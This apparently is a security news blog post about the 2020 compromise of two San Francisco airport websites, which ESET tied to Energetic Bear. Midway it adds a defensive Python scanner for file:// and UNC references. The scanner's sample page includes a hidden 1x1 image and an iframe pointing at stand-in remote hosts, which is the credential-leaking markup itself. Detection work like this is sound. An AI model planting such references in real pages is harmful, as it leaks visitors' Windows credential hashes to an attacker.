AskCyberSecurity.com

San Francisco Airport Data Breach Pinned on Russian Hackers

2020-04-15 by Max

Data Breach of Two San Francisco International Airport (SFO) Websites Linked to Russian Hackers

Last month, two websites belonging to San Francisco International Airport (SFO), SFOConnect.com and SFOConstruction.com, were hacked. The San Francisco airport data breach is now being pinned on hackers who are believed to be working for the Russian government, according to cyber security researchers at ESET.

A data breach notice posted on both websites states that the attackers “inserted malicious computer code on these websites to steal some users’ login credentials.” The malware has been removed from both sites. SFO Airport officials forced a reset of all airport email and network passwords. Anyone who has accessed either website should change their username and password.

ESET SFO Data Breach Twitter

ESET says a Russian Advanced Persistent Threat (APT) group known as Energetic Bear and Crouching Yeti is behind the hack of two of the airport’s websites. One of the breached websites, SFOConnect.com, is used by airport employees. The second website attacked, SFOConstruction.com, is a web portal used by SFO airport construction contractors. Both websites were compromised when hackers deployed malware to steal login credentials from website visitors. According to the airport report, the goal of the attack was to steal website login credentials. But according to ESET, the goal of the attack was to steal Windows login credentials from website visitors.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the ESET research team said.
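A site owner can audit pages for the kind of reference ESET describes: a resource URL that points at a remote host through the file:// prefix or a UNC path, which a Windows client resolves over SMB. The scanner below is an added example, not code from ESET or the airport; the function names and the sample HTML (using documentation-range addresses) are constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that make a browser load or navigate to a URL.
URL_ATTRS = {"src", "href", "data", "action", "poster", "background"}

def smb_target(url):
    """Return the remote host a URL would reach over SMB on Windows, or None."""
    u = url.strip()
    if u.startswith("\\\\"):  # raw UNC path: \\host\share\...
        return u[2:].split("\\", 1)[0] or None
    if not u.lower().startswith("file:"):
        return None  # http(s) and protocol-relative //host URLs are not SMB
    rest = u[5:].replace("\\", "/")
    path = rest.lstrip("/")
    slashes = len(rest) - len(path)
    # file://host/share and file:////host/share name a remote host;
    # file:/C:/x and file:///C:/x are local paths with an empty host.
    if slashes < 2 or slashes == 3:
        return None
    host = path.split("/", 1)[0]
    return host if host and host.lower() != "localhost" else None

class SmbRefScanner(HTMLParser):
    """Collects (line, tag, attribute, host) for every SMB-bound reference."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                host = smb_target(value)
                if host:
                    self.findings.append((self.getpos()[0], tag, name, host))

def scan_html(html):
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample page: two benign references, two that leave for a remote host.
SAMPLE = r'''<html><body>
<script src="//cdn.example/app.js"></script>
<img src="file:///C:/temp/logo.png">
<img src="file://203.0.113.9/icon.png" width="1" height="1">
<iframe src="\\198.51.100.7\s\x.html"></iframe>
</body></html>'''

if __name__ == "__main__":
    for line, tag, attr, host in scan_html(SAMPLE):
        print(f"line {line}: <{tag} {attr}> references remote host {host}")
```

Run against rendered page output or stored templates, a non-empty result is a reason to review how that markup got there; it does not inspect URLs that scripts build at runtime.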

The data breach is believed to be the work of a state-sponsored hacking group called Energetic Bear which works at the behest of the Russian government. There is no connection to Magecart malware used to steal credentials from ecommerce websites.

DHS and FBI Alert on Russian Hackers

In 2018, the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issued a joint technical alert warning of cyberthreats from Energetic Bear. The cyberattacks have targeted U.S. Government entities as well as critical infrastructure organizations in the energy, nuclear, commercial facilities, water, aviation, and manufacturing sectors since at least 2016. The hackers focus primarily on organizations in the Middle East, Turkey, and the United States. The alert reports that the hackers use malware and spear phishing emails to obtain remote access into IT networks. After gaining access, the hackers conducted network reconnaissance, gathered credentials, moved laterally through networks, and collected data on Industrial Control Systems (ICS).

Filed Under: Data Breach Tagged With: Russia

About Max

Max is a Data Privacy Coordinator at a major global law firm and a science fiction author residing in the Philadelphia area. He has been writing for https://www.askcybersecurity.com since early 2017.

